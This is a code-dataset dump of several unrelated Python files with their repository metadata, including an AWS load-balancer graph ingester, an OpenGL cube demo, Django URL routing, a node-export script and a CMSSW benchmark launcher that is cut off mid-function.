hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
795c4f2aaa6dd09b023ba14a1aaf12c6886ff3d7 | 191 | py | Python | images/__init__.py | otrenav/dkt-street-analysis | e112d2f5c1092a7c39a71d137c35ba61745af41c | [
"Apache-2.0"
] | null | null | null | images/__init__.py | otrenav/dkt-street-analysis | e112d2f5c1092a7c39a71d137c35ba61745af41c | [
"Apache-2.0"
] | null | null | null | images/__init__.py | otrenav/dkt-street-analysis | e112d2f5c1092a7c39a71d137c35ba61745af41c | [
"Apache-2.0"
] | null | null | null | from shared import print_
def image_profiles(**kwargs):
    """Stub for the image-profiles analysis step.

    Logs the invocation (title banner plus the raw keyword arguments) and
    then fails loudly, since the feature is not implemented yet.
    """
    header = "IMAGE PROFILES"
    print_(header, title=True)
    print_(kwargs)
    raise NotImplementedError("image_profiles() is not yet implemented")
| 23.875 | 72 | 0.743455 |
795c4f4d9d1a1ed4220b87dd6f41160659c9ce94 | 8,610 | py | Python | cartography/intel/aws/ec2/load_balancer_v2s.py | kevin-j-smith/cartography | 23cfa9b88b626dc8a410d6a0363fa02410990c2e | [
"Apache-2.0"
] | null | null | null | cartography/intel/aws/ec2/load_balancer_v2s.py | kevin-j-smith/cartography | 23cfa9b88b626dc8a410d6a0363fa02410990c2e | [
"Apache-2.0"
] | null | null | null | cartography/intel/aws/ec2/load_balancer_v2s.py | kevin-j-smith/cartography | 23cfa9b88b626dc8a410d6a0363fa02410990c2e | [
"Apache-2.0"
] | null | null | null | import logging
from typing import Dict
from typing import List
import boto3
import botocore
import neo4j
from .util import get_botocore_config
from cartography.util import aws_handle_regions
from cartography.util import run_cleanup_job
from cartography.util import timeit
logger = logging.getLogger(__name__)
@timeit
@aws_handle_regions
def get_load_balancer_v2_listeners(client: botocore.client.BaseClient, load_balancer_arn: str) -> List[Dict]:
    """Return every listener attached to the given ELBv2 load balancer.

    :param client: a boto3 'elbv2' client.
    :param load_balancer_arn: ARN of the load balancer to describe.
    :return: list of listener dicts as returned by describe_listeners.
    """
    result: List[Dict] = []
    pages = client.get_paginator('describe_listeners').paginate(LoadBalancerArn=load_balancer_arn)
    for page in pages:
        result.extend(page['Listeners'])
    return result
@timeit
def get_load_balancer_v2_target_groups(client: botocore.client.BaseClient, load_balancer_arn: str) -> List[Dict]:
    """Return the load balancer's target groups, each annotated with its target ids.

    Each returned target-group dict gains a 'Targets' key holding the ids of
    its registered targets (taken from describe_target_health).
    """
    groups: List[Dict] = []
    paginator = client.get_paginator('describe_target_groups')
    for page in paginator.paginate(LoadBalancerArn=load_balancer_arn):
        groups.extend(page['TargetGroups'])
    # Enrich each group with the ids of its registered targets.
    for group in groups:
        health = client.describe_target_health(TargetGroupArn=group['TargetGroupArn'])
        group['Targets'] = [
            description['Target']['Id']
            for description in health['TargetHealthDescriptions']
        ]
    return groups
@timeit
@aws_handle_regions
def get_loadbalancer_v2_data(boto3_session: boto3.Session, region: str) -> List[Dict]:
    """Describe all ELBv2 load balancers in a region.

    Each returned dict is augmented with 'Listeners' and 'TargetGroups' keys,
    filled by additional API calls per load balancer.
    """
    client = boto3_session.client('elbv2', region_name=region, config=get_botocore_config())
    load_balancers: List[Dict] = []
    for page in client.get_paginator('describe_load_balancers').paginate():
        load_balancers.extend(page['LoadBalancers'])
    # Each load balancer needs extra API calls for its listeners and target groups.
    for lb in load_balancers:
        arn = lb['LoadBalancerArn']
        lb['Listeners'] = get_load_balancer_v2_listeners(client, arn)
        lb['TargetGroups'] = get_load_balancer_v2_target_groups(client, arn)
    return load_balancers
@timeit
def load_load_balancer_v2s(
    neo4j_session: neo4j.Session, data: List[Dict], region: str, current_aws_account_id: str,
    update_tag: int,
) -> None:
    """Ingest ELBv2 load balancers into the graph.

    For each load balancer, creates/updates the LoadBalancerV2 node (keyed by
    its DNS name, not its ARN), links it to the owning AWSAccount, and then
    wires up subnets, security groups, listeners and target instances.

    :param data: load balancer dicts from get_loadbalancer_v2_data().
    """
    ingest_load_balancer_v2 = """
    MERGE (elbv2:LoadBalancerV2{id: $ID})
    ON CREATE SET elbv2.firstseen = timestamp(), elbv2.createdtime = $CREATED_TIME
    SET elbv2.lastupdated = $update_tag, elbv2.name = $NAME, elbv2.dnsname = $DNS_NAME,
    elbv2.canonicalhostedzonenameid = $HOSTED_ZONE_NAME_ID,
    elbv2.type = $ELBv2_TYPE,
    elbv2.scheme = $SCHEME, elbv2.region = $Region
    WITH elbv2
    MATCH (aa:AWSAccount{id: $AWS_ACCOUNT_ID})
    MERGE (aa)-[r:RESOURCE]->(elbv2)
    ON CREATE SET r.firstseen = timestamp()
    SET r.lastupdated = $update_tag
    """
    for lb in data:
        load_balancer_id = lb["DNSName"]
        neo4j_session.run(
            ingest_load_balancer_v2,
            ID=load_balancer_id,
            CREATED_TIME=str(lb["CreatedTime"]),
            NAME=lb["LoadBalancerName"],
            DNS_NAME=load_balancer_id,
            HOSTED_ZONE_NAME_ID=lb.get("CanonicalHostedZoneNameID"),
            ELBv2_TYPE=lb.get("Type"),
            SCHEME=lb.get("Scheme"),
            AWS_ACCOUNT_ID=current_aws_account_id,
            Region=region,
            update_tag=update_tag,
        )
        if lb["AvailabilityZones"]:
            az = lb["AvailabilityZones"]
            load_load_balancer_v2_subnets(neo4j_session, load_balancer_id, az, region, update_tag)
        # NLB's don't have SecurityGroups, so check for one first.
        if 'SecurityGroups' in lb and lb["SecurityGroups"]:
            ingest_load_balancer_v2_security_group = """
            MATCH (elbv2:LoadBalancerV2{id: $ID}),
            (group:EC2SecurityGroup{groupid: $GROUP_ID})
            MERGE (elbv2)-[r:MEMBER_OF_EC2_SECURITY_GROUP]->(group)
            ON CREATE SET r.firstseen = timestamp()
            SET r.lastupdated = $update_tag
            """
            for group in lb["SecurityGroups"]:
                neo4j_session.run(
                    ingest_load_balancer_v2_security_group,
                    ID=load_balancer_id,
                    GROUP_ID=str(group),
                    update_tag=update_tag,
                )
        if lb['Listeners']:
            load_load_balancer_v2_listeners(neo4j_session, load_balancer_id, lb['Listeners'], update_tag)
        if lb['TargetGroups']:
            # BUGFIX: this call was duplicated verbatim, causing every
            # EXPOSE/RESOURCE relationship to be written twice per LB.
            load_load_balancer_v2_target_groups(
                neo4j_session, load_balancer_id, lb['TargetGroups'],
                current_aws_account_id, update_tag,
            )
@timeit
def load_load_balancer_v2_subnets(
    neo4j_session: neo4j.Session, load_balancer_id: str, az_data: List[Dict],
    region: str, update_tag: int,
) -> None:
    """Attach the load balancer to the EC2 subnet of each availability zone."""
    ingest_load_balancer_subnet = """
    MATCH (elbv2:LoadBalancerV2{id: $ID})
    MERGE (subnet:EC2Subnet{subnetid: $SubnetId})
    ON CREATE SET subnet.firstseen = timestamp()
    SET subnet.region = $region, subnet.lastupdated = $update_tag
    WITH elbv2, subnet
    MERGE (elbv2)-[r:SUBNET]->(subnet)
    ON CREATE SET r.firstseen = timestamp()
    SET r.lastupdated = $update_tag
    """
    # One query per availability zone; each zone dict carries its SubnetId.
    for zone in az_data:
        neo4j_session.run(
            ingest_load_balancer_subnet,
            ID=load_balancer_id,
            SubnetId=zone['SubnetId'],
            region=region,
            update_tag=update_tag,
        )
@timeit
def load_load_balancer_v2_target_groups(
    neo4j_session: neo4j.Session, load_balancer_id: str, target_groups: List[Dict], current_aws_account_id: str,
    update_tag: int,
) -> None:
    """Create EXPOSE relationships from the load balancer to its EC2 instance targets.

    Also links each exposed instance to the owning AWSAccount as a RESOURCE.
    """
    ingest_instances = """
    MATCH (elbv2:LoadBalancerV2{id: $ID}), (instance:EC2Instance{instanceid: $INSTANCE_ID})
    MERGE (elbv2)-[r:EXPOSE]->(instance)
    ON CREATE SET r.firstseen = timestamp()
    SET r.lastupdated = $update_tag
    WITH instance
    MATCH (aa:AWSAccount{id: $AWS_ACCOUNT_ID})
    MERGE (aa)-[r:RESOURCE]->(instance)
    ON CREATE SET r.firstseen = timestamp()
    SET r.lastupdated = $update_tag
    """
    for target_group in target_groups:
        # Only working on EC2 Instances now. TODO: Add IP & Lambda EXPOSE.
        if target_group['TargetType'] != 'instance':
            continue
        for instance_id in target_group["Targets"]:
            neo4j_session.run(
                ingest_instances,
                ID=load_balancer_id,
                INSTANCE_ID=instance_id,
                AWS_ACCOUNT_ID=current_aws_account_id,
                update_tag=update_tag,
            )
@timeit
def load_load_balancer_v2_listeners(
    neo4j_session: neo4j.Session, load_balancer_id: str, listener_data: List[Dict],
    update_tag: int,
) -> None:
    """Ingest all listeners of one load balancer in a single UNWIND batch.

    Each listener becomes an Endpoint:ELBV2Listener node keyed by its ARN,
    connected to the LoadBalancerV2 node via an ELBV2_LISTENER relationship.
    """
    ingest_listener = """
    MATCH (elbv2:LoadBalancerV2{id: $LoadBalancerId})
    WITH elbv2
    UNWIND $Listeners as data
    MERGE (l:Endpoint:ELBV2Listener{id: data.ListenerArn})
    ON CREATE SET l.port = data.Port, l.protocol = data.Protocol,
    l.firstseen = timestamp(),
    l.targetgrouparn = data.TargetGroupArn
    SET l.lastupdated = $update_tag,
    l.ssl_policy = data.SslPolicy
    WITH l, elbv2
    MERGE (elbv2)-[r:ELBV2_LISTENER]->(l)
    ON CREATE SET r.firstseen = timestamp()
    SET r.lastupdated = $update_tag
    """
    # Single round trip: the whole listener list is passed as a parameter.
    neo4j_session.run(
        ingest_listener,
        LoadBalancerId=load_balancer_id,
        Listeners=listener_data,
        update_tag=update_tag,
    )
@timeit
def cleanup_load_balancer_v2s(neo4j_session: neo4j.Session, common_job_parameters: Dict) -> None:
    """Delete elbv2's and dependent resources in the DB without the most recent lastupdated tag."""
    # The cleanup steps are defined in the packaged JSON job description.
    run_cleanup_job('aws_ingest_load_balancers_v2_cleanup.json', neo4j_session, common_job_parameters)
@timeit
def sync_load_balancer_v2s(
    neo4j_session: neo4j.Session, boto3_session: boto3.session.Session, regions: List[str], current_aws_account_id: str,
    update_tag: int, common_job_parameters: Dict,
) -> None:
    """Sync ELBv2 load balancers for every region, then remove stale graph data."""
    for region in regions:
        logger.info("Syncing EC2 load balancers v2 for region '%s' in account '%s'.", region, current_aws_account_id)
        elbv2s = get_loadbalancer_v2_data(boto3_session, region)
        load_load_balancer_v2s(neo4j_session, elbv2s, region, current_aws_account_id, update_tag)
    # Cleanup runs once, after all regions have been ingested.
    cleanup_load_balancer_v2s(neo4j_session, common_job_parameters)
| 36.794872 | 120 | 0.677236 |
795c503f2815baea93da6f4eec5140fa1b285588 | 1,025 | py | Python | __init__.py | satishnarasimhan/marina | 846067931f3bea6d8a686820bffdc5650891b176 | [
"MIT"
] | null | null | null | __init__.py | satishnarasimhan/marina | 846067931f3bea6d8a686820bffdc5650891b176 | [
"MIT"
] | null | null | null | __init__.py | satishnarasimhan/marina | 846067931f3bea6d8a686820bffdc5650891b176 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#!/usr/bin/env python3
import functions as f
import phrases as ph
# Initialization / Driver Code
if __name__ == "__main__":
    # Greet the user and capture their name. get_audio() appears to return 0
    # when nothing intelligible was captured -- TODO confirm in functions.py.
    f.speak("Hello there. This is Marina, your digital assistant. How can I be of help? What is your name?")
    person = f.get_audio()
    if person == 0:
        person = 'there'
    f.speak("Hello " + person + '.')
    f.speak("What can i do for you?")
    # Wake word for the assistant.
    myname = "Marina"
    wake = myname
    # Main listen/respond loop: repeats until an exit phrase is heard.
    while(1):
        data = f.get_audio()
        if data == 0:
            continue
        # Acknowledge the wake word; the utterance still falls through to
        # talkback() below.
        if "Marina" in str(data) or "hey Marina" in str(data) or data.count(wake) > 0:
            f.speak("I'm listening . . Go ahead " + person)
        # Any of these exit phrases ends the session.
        if "exit" in str(data) or "Good bye" in str(data) or "sleep" in str(data) or "please stop" in str(data) :
            if (person == 'there'):
                f.speak("Ok. Bye for now")
            else:
                f.speak("Ok. Bye "+ person +'.')
            break
        ph.talkback(data,person)
| 25.625 | 109 | 0.527805 |
795c50408779bbc5c6365380cfa24f96405f9984 | 235 | py | Python | examples/ehireps/testing.py | hanyas/reps | 447c461b89dec516ce3368d841cfe9734be78199 | [
"MIT"
] | 8 | 2021-06-21T18:58:56.000Z | 2021-12-13T09:47:41.000Z | examples/ehireps/testing.py | hanyas/reps | 447c461b89dec516ce3368d841cfe9734be78199 | [
"MIT"
] | null | null | null | examples/ehireps/testing.py | hanyas/reps | 447c461b89dec516ce3368d841cfe9734be78199 | [
"MIT"
] | 1 | 2021-06-29T04:42:45.000Z | 2021-06-29T04:42:45.000Z | from reps.ehireps import eHiREPS
from reps.envs import Himmelblau
# Run episodic HiREPS on the Himmelblau test function. Presumably
# nb_components is the number of mixture components and kl_bound the KL
# trust region per update -- confirm against the eHiREPS API.
ehireps = eHiREPS(func=Himmelblau(),
                  nb_components=5, nb_episodes=2500,
                  kl_bound=0.1)
# Run 10 optimization iterations; `trace` holds the returned results.
trace = ehireps.run(nb_iter=10, verbose=True)
| 23.5 | 51 | 0.67234 |
795c50799d6f8009bbf14c4a25c81033682fce62 | 1,027 | py | Python | Bio/Align/Applications/__init__.py | amblina/biopython | 5045a7a3e86d5b32e0eaab941ab35daac86c59f8 | [
"PostgreSQL"
] | 1 | 2018-12-27T08:43:52.000Z | 2018-12-27T08:43:52.000Z | Bio/Align/Applications/__init__.py | amblina/biopython | 5045a7a3e86d5b32e0eaab941ab35daac86c59f8 | [
"PostgreSQL"
] | null | null | null | Bio/Align/Applications/__init__.py | amblina/biopython | 5045a7a3e86d5b32e0eaab941ab35daac86c59f8 | [
"PostgreSQL"
] | 1 | 2018-12-27T08:43:42.000Z | 2018-12-27T08:43:42.000Z | # Copyright 2009 by Peter Cock & Cymon J. Cox. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Alignment command line tool wrappers."""
from ._Muscle import MuscleCommandline
from ._Clustalw import ClustalwCommandline
from ._ClustalOmega import ClustalOmegaCommandline
from ._Prank import PrankCommandline
from ._Mafft import MafftCommandline
from ._Dialign import DialignCommandline
from ._Probcons import ProbconsCommandline
from ._TCoffee import TCoffeeCommandline
from ._MSAProbs import MSAProbsCommandline
# Make this explicit, then they show up in the API docs
__all__ = ["MuscleCommandline",
"ClustalwCommandline",
"ClustalOmegaCommandline",
"PrankCommandline",
"MafftCommandline",
"DialignCommandline",
"ProbconsCommandline",
"TCoffeeCommandline",
"MSAProbsCommandline",
]
| 36.678571 | 70 | 0.737098 |
795c508a32e6a55119a6144a8bcee344078b046e | 1,731 | py | Python | FourthDimViz/TwoDGL.py | Tellusionist/FourthDimViz | 6f33882fe122a7f6d10195be4d6c30c2ee68b7e6 | [
"MIT"
] | null | null | null | FourthDimViz/TwoDGL.py | Tellusionist/FourthDimViz | 6f33882fe122a7f6d10195be4d6c30c2ee68b7e6 | [
"MIT"
] | null | null | null | FourthDimViz/TwoDGL.py | Tellusionist/FourthDimViz | 6f33882fe122a7f6d10195be4d6c30c2ee68b7e6 | [
"MIT"
] | null | null | null | import pygame
from OpenGL.GL import glTranslatef, glRotatef, glClear, glBegin, glEnd, GL_LINES, glVertex3fv, GL_COLOR_BUFFER_BIT, GL_DEPTH_BUFFER_BIT
from OpenGL.GLU import gluPerspective
# setup 3D cube vertices
vertices= (
( 1, -1, -1 ),
( 1, 1, -1 ),
(-1, 1, -1 ),
(-1, -1, -1 ),
( 1, -1, 1 ),
( 1, 1, 1 ),
(-1, -1, 1 ),
(-1, 1, 1 )
)
# edges connecting each vertex
edges = (
( 0, 1 ),
( 0, 3 ),
( 0, 4 ),
( 2, 1 ),
( 2, 3 ),
( 2, 7 ),
( 6, 3 ),
( 6, 4 ),
( 6, 7 ),
( 5, 1 ),
( 5, 4 ),
( 5, 7 )
)
def Cube():
    """Draw the wireframe cube: one GL line segment per edge."""
    glBegin(GL_LINES)
    for start, end in edges:
        glVertex3fv(vertices[start])
        glVertex3fv(vertices[end])
    glEnd()
def main():
    """Open a pygame/OpenGL window and render the rotating wireframe cube."""
    pygame.init()
    display = (800,600)
    pygame.display.set_mode(display, pygame.DOUBLEBUF|pygame.OPENGL)
    # perspective options: FOV, aspect ratio, znear, zfar
    gluPerspective(45, (display[0]/display[1]), 0.1, 50.0)
    # move "us" back 5 units (so we can see the cube)
    glTranslatef(0.0,0.0, -5)
    # Run pygame, exit when clicking close window
    while True:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
                quit()
        # rotate by 1 degree per frame about the axis (3, 1, 1)
        glRotatef(1, 3, 1, 1)
        # clear the color and depth buffers before drawing the next frame
        glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)
        # draw the cube defined above
        Cube()
        # update the pygame display and wait a bit
        pygame.display.flip()
        pygame.time.wait(1)
main() | 24.041667 | 135 | 0.510687 |
795c50ed8148173565af2c03ee7ac426ad83d76c | 1,009 | py | Python | ddosdb/website/urls.py | ddos-clearing-house/ddosdb | bf65d4649cd07d8b097b9dade59860465b0f3634 | [
"MIT"
] | 6 | 2019-05-22T11:15:48.000Z | 2021-10-02T06:06:53.000Z | ddosdb/website/urls.py | ddos-clearing-house/ddosdb | bf65d4649cd07d8b097b9dade59860465b0f3634 | [
"MIT"
] | 13 | 2019-02-25T11:12:22.000Z | 2022-01-08T18:16:25.000Z | ddosdb/website/urls.py | ddos-clearing-house/ddosdb | bf65d4649cd07d8b097b9dade59860465b0f3634 | [
"MIT"
] | 3 | 2020-09-10T10:14:37.000Z | 2022-01-18T19:23:38.000Z | """website URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
from django.conf import settings
from django.urls import include, path
# Root routing: the ddosdb app serves the site root; Django admin at /admin/.
urlpatterns = [
    path('', include('ddosdb.urls')),
    path('admin/', admin.site.urls),
]
# In DEBUG mode only, mount django-debug-toolbar at /__debug__/ ahead of the
# regular patterns.
if settings.DEBUG:
    import debug_toolbar
    urlpatterns = [
        path('__debug__/', include(debug_toolbar.urls)),
    ] + urlpatterns
795c514dc559235b001399bd197e82322c9589f0 | 5,475 | py | Python | export.py | sickpig/cashnodes | a7fd9d48a1507fa99182746663b98b39938219b9 | [
"MIT"
] | null | null | null | export.py | sickpig/cashnodes | a7fd9d48a1507fa99182746663b98b39938219b9 | [
"MIT"
] | null | null | null | export.py | sickpig/cashnodes | a7fd9d48a1507fa99182746663b98b39938219b9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# export.py - Exports enumerated data for reachable nodes into a JSON file.
#
# Copyright (c) Addy Yeow Chin Heng <ayeowch@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
Exports enumerated data for reachable nodes into a JSON file.
"""
import json
import logging
import os
import sys
import time
import re
from binascii import hexlify, unhexlify
from ConfigParser import ConfigParser
from utils import new_redis_conn
REDIS_CONN = None
CONF = {}
def get_row(node):
    """
    Returns enumerated row data from Redis for the specified node.

    Returns '' when the node's user agent matches the configured exclusion
    pattern; otherwise a flat tuple of node fields followed by height,
    hostname and the geoip fields.
    """
    # address, port, version, user_agent, timestamp, services
    # NOTE(review): eval() deserializes the repr written by this pipeline's
    # own processes; never feed untrusted data through this path.
    node = eval(node)
    uagent = node[3]
    p = re.compile(CONF['exclude_uagent_string'])
    if (p.search(uagent) is not None):
        return ''
    address = node[0]
    port = node[1]
    services = node[-1]
    # height is kept as a 1-tuple so it can be concatenated into the row below.
    height = REDIS_CONN.get('height:{}-{}-{}'.format(address, port, services))
    if height is None:
        height = (0,)
    else:
        height = (int(height),)
    hostname = REDIS_CONN.hget('resolve:{}'.format(address), 'hostname')
    hostname = (hostname,)
    geoip = REDIS_CONN.hget('resolve:{}'.format(address), 'geoip')
    if geoip is None:
        # city, country, latitude, longitude, timezone, asn, org
        geoip = (None, None, 0.0, 0.0, None, None, None)
    else:
        # Stored as the repr of the geoip tuple (presumably by resolve.py).
        geoip = eval(geoip)
    return node + height + hostname + geoip
MAX_DUMPED_SNAPSHOTS = 500
def export_nodes(nodes, timestamp):
    """
    Merges enumerated data for the specified nodes and exports them into
    timestamp-prefixed JSON file.
    """
    start = time.time()
    # Skip nodes for which get_row() returned '' (excluded user agents).
    rows = [row for row in (get_row(node) for node in nodes) if row != '']
    elapsed = time.time() - start
    logging.info("Elapsed: %d", elapsed)
    dump = os.path.join(CONF['export_dir'], "{}.json".format(timestamp))
    open(dump, 'w').write(json.dumps(rows, encoding="latin-1"))
    # Track the dumped snapshot, keeping only the most recent ones.
    REDIS_CONN.lpush('dumped_snapshots', timestamp)
    REDIS_CONN.ltrim('dumped_snapshots', 0, MAX_DUMPED_SNAPSHOTS)
    logging.info("Wrote %s", dump)
def init_conf(argv):
    """
    Populates CONF with key-value pairs from configuration file.
    """
    parser = ConfigParser()
    parser.read(argv[1])
    CONF['logfile'] = parser.get('export', 'logfile')
    CONF['magic_number'] = unhexlify(parser.get('export', 'magic_number'))
    CONF['db'] = parser.getint('export', 'db')
    CONF['debug'] = parser.getboolean('export', 'debug')
    CONF['export_dir'] = parser.get('export', 'export_dir')
    CONF['exclude_uagent_string'] = parser.get('export', 'exclude_uagent_string')
    # Create the export directory on first run.
    if not os.path.exists(CONF['export_dir']):
        os.makedirs(CONF['export_dir'])
def main(argv):
    """Entry point: block on 'resolve' pub/sub messages and export snapshots.

    argv[1] must be the path to the configuration file. Returns 1 on bad
    usage; otherwise loops forever (the trailing return 0 is unreachable).
    """
    if len(argv) < 2 or not os.path.exists(argv[1]):
        print("Usage: export.py [config]")
        return 1
    # Initialize global conf
    init_conf(argv)
    # Initialize logger
    loglevel = logging.INFO
    if CONF['debug']:
        loglevel = logging.DEBUG
    logformat = ("%(asctime)s,%(msecs)05.1f %(levelname)s (%(funcName)s) "
                 "%(message)s")
    logging.basicConfig(level=loglevel,
                        format=logformat,
                        filename=CONF['logfile'],
                        filemode='w')
    print("Log: {}, press CTRL+C to terminate..".format(CONF['logfile']))
    global REDIS_CONN
    REDIS_CONN = new_redis_conn(db=CONF['db'])
    # Channel names are namespaced by the network magic number.
    subscribe_key = 'resolve:{}'.format(hexlify(CONF['magic_number']))
    publish_key = 'export:{}'.format(hexlify(CONF['magic_number']))
    pubsub = REDIS_CONN.pubsub()
    pubsub.subscribe(subscribe_key)
    while True:
        msg = pubsub.get_message()
        if msg is None:
            time.sleep(0.001)  # 1 ms artificial intrinsic latency.
            continue
        # 'resolve' message is published by resolve.py after resolving hostname
        # and GeoIP data for all reachable nodes.
        if msg['channel'] == subscribe_key and msg['type'] == 'message':
            timestamp = int(msg['data'])  # From ping.py's 'snapshot' message
            logging.info("Timestamp: %d", timestamp)
            nodes = REDIS_CONN.smembers('opendata')
            logging.info("Nodes: %d", len(nodes))
            export_nodes(nodes, timestamp)
            # Notify downstream consumers that this snapshot was exported.
            REDIS_CONN.publish(publish_key, timestamp)
    return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
| 32.205882 | 79 | 0.652785 |
795c51f8cff7e057b6c4872de079c179d61c4014 | 140 | py | Python | configs/pspnet/pspnet_r101-d8_480x480_80k_pascal_context_59.py | weiyx16/mmsegmentation | 6d35d76195f173fbc6b119a7d7815e67d78024c6 | [
"Apache-2.0"
] | 367 | 2022-01-14T03:32:25.000Z | 2022-03-31T04:48:20.000Z | configs/pspnet/pspnet_r101-d8_480x480_80k_pascal_context_59.py | weiyx16/mmsegmentation | 6d35d76195f173fbc6b119a7d7815e67d78024c6 | [
"Apache-2.0"
] | 27 | 2022-01-27T07:12:49.000Z | 2022-03-31T04:31:13.000Z | configs/pspnet/pspnet_r101-d8_480x480_80k_pascal_context_59.py | weiyx16/mmsegmentation | 6d35d76195f173fbc6b119a7d7815e67d78024c6 | [
"Apache-2.0"
] | 53 | 2022-01-18T11:21:43.000Z | 2022-03-31T06:42:41.000Z | _base_ = './pspnet_r50-d8_480x480_80k_pascal_context_59.py'
model = dict(pretrained='open-mmlab://resnet101_v1c', backbone=dict(depth=101))
| 46.666667 | 79 | 0.792857 |
795c523e43cc2c6f2a77898917a5173e9bbc2414 | 6,926 | py | Python | Validation/Performance/scripts/cmsBenchmark.py | trackerpro/cmssw | 3e05774a180a5f4cdc70b713bd711c23f9364765 | [
"Apache-2.0"
] | 1 | 2019-03-09T19:47:49.000Z | 2019-03-09T19:47:49.000Z | Validation/Performance/scripts/cmsBenchmark.py | trackerpro/cmssw | 3e05774a180a5f4cdc70b713bd711c23f9364765 | [
"Apache-2.0"
] | null | null | null | Validation/Performance/scripts/cmsBenchmark.py | trackerpro/cmssw | 3e05774a180a5f4cdc70b713bd711c23f9364765 | [
"Apache-2.0"
] | 1 | 2019-04-03T19:23:27.000Z | 2019-04-03T19:23:27.000Z | #!/usr/bin/env python
"""
Usage: ./cmsBenchmark.py [options]
Options:
--cpu=... specify the core on which to run the performance suite
--cores=... specify the number of cores of the machine (can be used with 0 to stop cmsScimark from running on the other cores)
-n ..., --numevts specify the number of events for each tests/each candle/each step
--candle=... specify the candle to run instead of all the 7 candles of the suite
--step=... specify the step to run instead of all steps of the suite
--repeat=... specify the number of times to re-run the whole suite
-h, --help show this help
-d show debugging information
Legal entries for individual candles (--candle option):
HiggsZZ4LM190
MinBias
SingleElectronE1000
SingleMuMinusPt10
SinglePiMinusE1000
TTbar
QCD_80_120
Legal entries for specific tests (--step option):
GEN
SIM
DIGI
L1
DIGI2RAW
HLT
RAW2DIGI
RECO
and combinations of steps like:
GEN-SIM
L1-DIGI2RAW-HLT
DIGI2RAW-RAW2DIGI
and sequences of steps or combinations of steps like:
GEN-SIM,DIGI,L1-DIGI2RAW-RAW2DIGI,RECO
Note: when the necessary pre-steps are omitted, cmsPerfSuite.py will take care of it.
Examples:
./cmsBenchmark.py
This will run with the default options --cpu=1, --cores=4, --numevts=100, --step=GEN-SIM,DIGI,RECO --repeat=1 (Note: all results will be reported in a directory called Run1).
OR
./cmsBenchmark.py --cpu=2
This will run the test on core cpu2.
OR
./cmsBenchmark.py --cpu=0,1 --cores=8 -n 200
This will run the suite with 200 events for all tests/candles/step, on cores cpu0 and cpu1 simulataneously, while running the cmsScimark benchmarks on the other 6 cores.
OR
./cmsBenchmark.py --cores=8 --repeat=10 --candle QCD_80_120
This will run the performance tests only on candle QCD_80_120, running 100 evts for all steps, and it will repeat these tests 10 times, saving the results in 10 separate directories (each called RunN, with N=1,..,10) to check for systematic/statistical uncertainties. Note that by default --repeat=1, so all results will be in a directory called Run1.
OR
./cmsBenchmark.py --step=GEN-SIM,DIGI,RECO
This will run the performance tests only for the steps "GEN,SIM" (at once), "DIGI" and "RECO" taking care of running the necessary intermediate steps to make sure all steps can be run.
"""
from __future__ import print_function
import os
#Get some environment variables to use
cmssw_base=os.environ["CMSSW_BASE"]
cmssw_release_base=os.environ["CMSSW_RELEASE_BASE"]
cmssw_version=os.environ["CMSSW_VERSION"]
host=os.environ["HOST"]
user=os.environ["USER"]
#Performance suites script used:
Script="cmsPerfSuite.py"
#Options handling
import getopt
import sys
def usage():
    """Print the module-level usage text (the file docstring)."""
    print(__doc__)
def main(argv):
    """Parse benchmark options and launch cmsPerfSuite.py, once per repetition.

